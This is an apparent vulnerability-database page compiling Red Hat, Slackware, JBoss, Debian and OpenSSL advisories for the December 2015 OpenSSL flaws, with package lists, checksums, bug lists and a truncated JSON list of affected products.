ppc64le: openssl-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-devel-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-libs-1.0.1e-51.el7_2.1.ppc64le.rpm

s390x: openssl-1.0.1e-51.el7_2.1.s390x.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm openssl-devel-1.0.1e-51.el7_2.1.s390.rpm openssl-devel-1.0.1e-51.el7_2.1.s390x.rpm openssl-libs-1.0.1e-51.el7_2.1.s390.rpm openssl-libs-1.0.1e-51.el7_2.1.s390x.rpm

x86_64: openssl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-devel-1.0.1e-51.el7_2.1.i686.rpm openssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm openssl-libs-1.0.1e-51.el7_2.1.i686.rpm openssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

aarch64: openssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm openssl-perl-1.0.1e-51.el7_2.1.aarch64.rpm openssl-static-1.0.1e-51.el7_2.1.aarch64.rpm

ppc64: openssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm openssl-perl-1.0.1e-51.el7_2.1.ppc64.rpm openssl-static-1.0.1e-51.el7_2.1.ppc.rpm openssl-static-1.0.1e-51.el7_2.1.ppc64.rpm

ppc64le: openssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-perl-1.0.1e-51.el7_2.1.ppc64le.rpm openssl-static-1.0.1e-51.el7_2.1.ppc64le.rpm

s390x: openssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm openssl-perl-1.0.1e-51.el7_2.1.s390x.rpm openssl-static-1.0.1e-51.el7_2.1.s390.rpm openssl-static-1.0.1e-51.el7_2.1.s390x.rpm

x86_64: openssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm openssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm openssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm openssl-static-1.0.1e-51.el7_2.1.i686.rpm openssl-static-1.0.1e-51.el7_2.1.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: openssl-1.0.1e-51.el7_2.1.src.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2015-3194 https://access.redhat.com/security/cve/CVE-2015-3195 https://access.redhat.com/security/cve/CVE-2015-3196 https://access.redhat.com/security/updates/classification/#moderate https://openssl.org/news/secadv/20151203.txt

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFWblodXlSAg2UNWIIRAt6yAKCw1yHbcUPDEPeokS22dMKyo6YFsQCgmPe4 dpIS/iR9oiOKMXJY5t447ME= =qvLr -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .

Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz: Upgraded. Anon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794). For more information, see: https://openssl.org/news/secadv_20151203.txt https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1794 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3193 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3194 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3195 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3196 ( Security fix ) patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz: Upgraded. +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zh-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.0.txz

Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz

Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zh-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.1.txz

Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz

Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zh-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.37.txz

Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz

Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1q-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.0.txz

Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1q-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz

Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1q-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1q-i486-1_slack14.1.txz

Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz

Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.2e-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.2e-i586-1.txz

Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.2e-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.2e-x86_64-1.txz

MD5 signatures: +-------------+

Slackware 13.0 packages: 5e45a22283b41aaf4f867918746ebc1d openssl-0.9.8zh-i486-1_slack13.0.txz 0ad74b36ce143d28e15dfcfcf1fcb483 openssl-solibs-0.9.8zh-i486-1_slack13.0.txz

Slackware x86_64 13.0 packages: c360d323a2bed57c62d6699b2d4be65e openssl-0.9.8zh-x86_64-1_slack13.0.txz 122240badbfbe51c842a9102d3cfe30f openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz

Slackware 13.1 packages: 1bf98b27573b20a7de5f6359f3eadbd7 openssl-0.9.8zh-i486-1_slack13.1.txz 2b732f1f29de1cb6078fd1ddda8eb9ec openssl-solibs-0.9.8zh-i486-1_slack13.1.txz

Slackware x86_64 13.1 packages: 735c3bbc55902ec57e46370cde32ea4b openssl-0.9.8zh-x86_64-1_slack13.1.txz 483f506f3b86572e60fe4c46a67c226b openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz

Slackware 13.37 packages: 9af41ba336c64b92d5bbd86c17a93e94 openssl-0.9.8zh-i486-1_slack13.37.txz b83170b9c5ec56b4e2dc882b3c64b306 openssl-solibs-0.9.8zh-i486-1_slack13.37.txz

Slackware x86_64 13.37 packages: 2220ff161d0bf3635d2dea7caae6e5e7 openssl-0.9.8zh-x86_64-1_slack13.37.txz 17b3e8884f383e3327d5e4a6080634cb openssl-solibs-0.9.8zh-x86_64-1_slack13.37.txz

Slackware 14.0 packages: ced42bc3799f2b54aeb3b631a2864b90 openssl-1.0.1q-i486-1_slack14.0.txz 52965f98ee30e8f3d22bde6b0fe7f53b openssl-solibs-1.0.1q-i486-1_slack14.0.txz

Slackware x86_64 14.0 packages: cbf49f09bdcebc61cf7fcb2857dc3a71 openssl-1.0.1q-x86_64-1_slack14.0.txz 156911f58b71ee6369467d8fec34a59f openssl-solibs-1.0.1q-x86_64-1_slack14.0.txz

Slackware 14.1 packages: 36d5f60b634788d4315ffb46ef6d4d88 openssl-1.0.1q-i486-1_slack14.1.txz fc18f566a9a2f5c6adb15d288245403a openssl-solibs-1.0.1q-i486-1_slack14.1.txz

Slackware x86_64 14.1 packages: 03f1832417a79f73b35180a39ae4fb16 openssl-1.0.1q-x86_64-1_slack14.1.txz bf447792f23deb14e1fe3f008a6b78a7 openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz

Slackware -current packages: 27b2974199a970392ed2192bf4a207a9 a/openssl-solibs-1.0.2e-i586-1.txz 940a7653a6cadb44ce143d3b0e0eaa16 n/openssl-1.0.2e-i586-1.txz

Slackware x86_64 -current packages: 8636a45f49d186d505b356b9be66309b a/openssl-solibs-1.0.2e-x86_64-1.txz 87c33a76a94993864a52bfe4e5d5b2f0 n/openssl-1.0.2e-x86_64-1.txz

Installation instructions: +------------------------+

Upgrade the packages as root:

upgradepkg openssl-1.0.1q-i486-1_slack14.1.txz openssl-solibs-1.0.1q-i486-1_slack14.1.txz

+-----+

Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com

This release of Red Hat JBoss Core Services httpd 2.4.23 serves as a replacement for JBoss Core Services Apache HTTP Server 2.4.6. (CVE-2014-8176, CVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2177, CVE-2016-2178, CVE-2016-2842)

This update fixes several flaws in libxml2. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)
This update fixes two flaws in mod_cluster. (CVE-2016-4459, CVE-2016-8612)
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2012-1148)

Red Hat would like to thank the OpenSSL project for reporting CVE-2014-8176, CVE-2015-0286, CVE-2016-2108, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842. Upstream acknowledges Stephen Henson (OpenSSL development team) as the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat), Hanno BAPck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105, CVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj Somorovsky as the original reporter of CVE-2016-2107; Yuval Yarom (University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv University), and Nadia Heninger (University of Pennsylvania) as the original reporters of CVE-2016-0702; and Adam Langley (Google/BoringSSL) as the original reporter of CVE-2016-0705.

See the corresponding CVE pages linked to in the References section for more information about each of the flaws listed in this advisory. Solution:

After installing the updated packages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):

801648 - CVE-2012-1148 expat: Memory leak in poolGrow 1121519 - CVE-2014-3523 httpd: WinNT MPM denial of service 1196737 - CVE-2015-0209 openssl: use-after-free on invalid EC private key import 1202366 - CVE-2015-0286 openssl: invalid pointer use in ASN1_TYPE_cmp() 1227574 - CVE-2015-3216 openssl: Crash in ssleay_rand_bytes due to locking regression 1228611 - CVE-2014-8176 OpenSSL: Invalid free in DTLS 1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4 1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter 1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak 1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint 1310596 - CVE-2016-0705 OpenSSL: Double-free in DSA code 1310599 - CVE-2016-0702 OpenSSL: Side channel attack on modular exponentiation 1311880 - CVE-2016-0797 OpenSSL: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption 1312219 - CVE-2016-0799 OpenSSL: Fix memory issues in BIO_*printf functions 1314757 - CVE-2016-2842 openssl: doapr_outch function does not verify that certain memory allocation succeeds 1319829 - CVE-2016-3627 libxml2: stack exhaustion while parsing xml files in recovery mode 1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data 1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder 1331426 - CVE-2016-2107 openssl: Padding oracle in AES-NI CBC MAC check 1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow 1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow 1332443 - CVE-2016-3705 libxml2: stack overflow before detecting invalid XML file 1332820 - CVE-2016-4483 libxml2: out-of-bounds read 1338682 - CVE-2016-1833 libxml2: Heap-based buffer overread in htmlCurrentChar 1338686 - CVE-2016-4447 libxml2: Heap-based buffer underreads due to xmlParseName 1338691 - CVE-2016-1835 libxml2: Heap use-after-free in xmlSAX2AttributeNs 1338696 - CVE-2016-1837 libxml2: Heap use-after-free in htmlPArsePubidLiteral and htmlParseSystemiteral 1338700 - CVE-2016-4448 libxml2: Format string vulnerability 1338701 - CVE-2016-4449 libxml2: Inappropriate fetch of entities content 1338702 - CVE-2016-1836 libxml2: Heap use-after-free in xmlDictComputeFastKey 1338703 - CVE-2016-1839 libxml2: Heap-based buffer overread in xmlDictAddString 1338705 - CVE-2016-1838 libxml2: Heap-based buffer overread in xmlPArserPrintFileContextInternal 1338706 - CVE-2016-1840 libxml2: Heap-buffer-overflow in xmlFAParserPosCharGroup 1338708 - CVE-2016-1834 libxml2: Heap-buffer-overflow in xmlStrncat 1338711 - CVE-2016-1762 libxml2: Heap-based buffer-overread in xmlNextChar 1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute 1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase 1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation 1362183 - CVE-2016-5419 curl: TLS session resumption client cert bypass 1362190 - CVE-2016-5420 curl: Re-using connection with wrong client cert 1373229 - CVE-2016-7141 curl: Incorrect reuse of client certificates 1382352 - CVE-2016-6808 mod_jk: Buffer overflow when concatenating virtual host name and URI 1387605 - CVE-2016-8612 JBCS mod_cluster: Protocol parsing logic error

JIRA issues fixed (https://issues.jboss.org/):

JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service

For the oldstable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u18.

For the stable distribution (jessie), these problems have been fixed in version 1.0.1k-3+deb8u2.

For the unstable distribution (sid), these problems have been fixed in version 1.0.2e-1 or earlier.

NOTE: WE ANTICIPATE THAT 1.0.0t AND 0.9.8zh WILL BE THE LAST RELEASES FOR THE 0.9.8 AND 1.0.0 VERSIONS AND THAT NO MORE SECURITY FIXES WILL BE PROVIDED (AS PER PREVIOUS ANNOUNCEMENTS). USERS ARE ADVISED TO UPGRADE TO LATER VERSIONS.

BN_mod_exp may produce incorrect results on x86_64 (CVE-2015-3193)

Severity: Moderate

There is a carry propagating bug in the x86_64 Montgomery squaring procedure. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be very significant and likely only accessible to a limited number of attackers. An attacker would additionally need online access to an unpatched system using the target private key in a scenario with persistent DH parameters and a private key that is shared between multiple clients. For example this can occur by default in OpenSSL DHE based SSL/TLS ciphersuites.

This issue affects OpenSSL version 1.0.2.

OpenSSL 1.0.2 users should upgrade to 1.0.2e

This issue was reported to OpenSSL on August 13 2015 by Hanno Böck. The fix was developed by Andy Polyakov of the OpenSSL development team.

Certificate verify crash with missing PSS parameter (CVE-2015-3194)

Severity: Moderate

The signature verification routines will crash with a NULL pointer dereference if presented with an ASN.1 signature using the RSA PSS algorithm and absent mask generation function parameter. Since these routines are used to verify certificate signature algorithms this can be used to crash any certificate verification operation and exploited in a DoS attack.

This issue affects OpenSSL versions 1.0.2 and 1.0.1.

OpenSSL 1.0.2 users should upgrade to 1.0.2e OpenSSL 1.0.1 users should upgrade to 1.0.1q

This issue was reported to OpenSSL on August 27 2015 by Loïc Jonas Etienne (Qnective AG). The fix was developed by Dr. Stephen Henson of the OpenSSL development team. This structure is used by the PKCS#7 and CMS routines so any application which reads PKCS#7 or CMS data from untrusted sources is affected. SSL/TLS is not affected.

This issue affects OpenSSL versions 1.0.2 and 1.0.1, 1.0.0 and 0.9.8.

OpenSSL 1.0.2 users should upgrade to 1.0.2e OpenSSL 1.0.1 users should upgrade to 1.0.1q OpenSSL 1.0.0 users should upgrade to 1.0.0t OpenSSL 0.9.8 users should upgrade to 0.9.8zh

This issue was reported to OpenSSL on November 9 2015 by Adam Langley (Google/BoringSSL) using libFuzzer. The fix was developed by Dr. Stephen Henson of the OpenSSL development team.

This issue was fixed in OpenSSL 1.0.2d and 1.0.1p but has not been previously listed in an OpenSSL security advisory. This issue also affects OpenSSL 1.0.0 and has not been previously fixed in an OpenSSL 1.0.0 release.

The fix was developed by Dr. Stephen Henson of the OpenSSL development team.

Anon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794)

Severity: Low

If a client receives a ServerKeyExchange for an anonymous DH ciphersuite with the value of p set to 0 then a seg fault can occur leading to a possible denial of service attack.

This issue affects OpenSSL version 1.0.2.

OpenSSL 1.0.2 users should upgrade to 1.0.2e

This issue was reported to OpenSSL on August 3 2015 by Guy Leaver (Cisco). The fix was developed by Matt Caswell of the OpenSSL development team.

Note

As per our previous announcements and our Release Strategy (https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these versions will be provided after that date. In the absence of significant security issues being identified prior to that date, the 1.0.0t and 0.9.8zh releases will be the last for those versions. Users of these versions are advised to upgrade.

References

URL for this Security Advisory: https://www.openssl.org/news/secadv/20151203.txt

Note: the online version of the advisory may be updated with additional details over time.

For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201512-0485",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1j"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0q"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "15.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "15.10"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0f"
      },
      {
        "model": "icewall sso agent option",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0o"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1m"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "22"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1i"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0k"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0n"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0j"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0r"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0e"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0s"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.7"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "icewall sso",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1a"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1k"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1d"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1h"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1n"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1o"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1f"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0p"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.3.35"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0i"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.0.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.0.13"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0m"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1e"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0c"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0b"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1g"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1c"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0g"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0a"
      },
      {
        "model": "enterprise linux server eus",
        "scope": "eq",
